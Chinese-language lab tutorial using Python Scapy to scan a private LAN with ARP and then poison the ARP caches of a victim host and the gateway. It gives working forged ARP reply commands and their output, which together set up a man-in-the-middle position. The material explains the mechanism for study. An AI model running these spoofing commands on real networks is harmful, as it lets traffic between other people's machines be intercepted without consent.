1、局域网Arp扫描: 1) 简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)

arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24')) Begin emission: ***Finished to send 256 packets. ................................................^C(复杂实现定义什么时候停止) Received 51 packets, got 3 answers, remaining 253 packets

print(arp2[0].show()) 0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding 0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding 0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding 2) 拆开看数据包192.168.80.251的字段:

print(arp2[0].res[2][1].fields)(复杂实现查看字段自动提取) {'src': '00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}

print(arp2[0].res[2][1].show())(复杂实现查看字段自动提取) ###[ Ethernet ]### dst= 00:0c:29:e2:bb:15 src= 00:0c:29:21:fd:03 type= 0x806 ###[ ARP ]### hwtype= 0x1 ptype= 0x800 hwlen= 6 plen= 4 op= is-at hwsrc= 00:0c:29:21:fd:03 psrc= 192.168.80.251 hwdst= 00:0c:29:e2:bb:15 pdst= 192.168.80.250 ###[ Padding ]### load= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

None 2、ARP spoof(arp毒化) 1)毒化192.168.80.251主机(告诉它网关mac是攻击者的mac地址): 192.168.80.1 mac地址为00:50:56:c0:00:08(网关) 192.168.80.250 mac地址为00:0c:29:e2:bb:15(攻击者) 192.168.80.251 mac地址为00:0c:29:21:fd:03(被攻击者)

arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251')) arp3.show() ###[ Ethernet ]### dst= 00:0c:29:21:fd:03 src= '00:0c:29:e2:bb:15' type= 0x806 ###[ ARP ]### hwtype= 0x1 ptype= 0x800 hwlen= 6 plen= 4 op= is-at hwsrc= 00:0c:29:e2:bb:15 psrc= 192.168.80.1 hwdst= 00:0c:29:21:fd:03 pdst= 192.168.80.251

arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251')) Begin emission: Finished to send 1 packets. ....^C Received 4 packets, got 0 answers, remaining 1 packets 由于arp为二层包只要目的mac正确就可以发送,192.168.80.251接收到arp回复报文只读取 ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.1'放入自己arp缓存中。 截图: 毒化前192.168.80.251 arp 缓存: 毒化后192.168.80.251 arp 缓存:

3) 毒化网关(告诉网关192.168.80.1主机192.168.80.251 mac地址为攻击者mac):

arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1')) arp4.show() ###[ Ethernet ]### dst= 00:50:56:c0:00:08 src= 00:0c:29:e2:bb:15 type= 0x806 ###[ ARP ]### hwtype= 0x1 ptype= 0x800 hwlen= 6 plen= 4 op= is-at hwsrc= 00:0c:29:e2:bb:15 psrc= 192.168.80.251 hwdst= 00:50:56:c0:00:08 pdst= 192.168.80.1

arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1')) Begin emission: Finished to send 1 packets. ........^C Received 8 packets, got 0 answers, remaining 1 packets 由于arp为二层包只要目的mac正确就可以发送,192.168.80.1接收到arp回复报文只读取 ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.251'放入自己arp缓存中。 截图: 毒化前192.168.80.1 arp 缓存:

毒化后192.168.80.1 arp 缓存: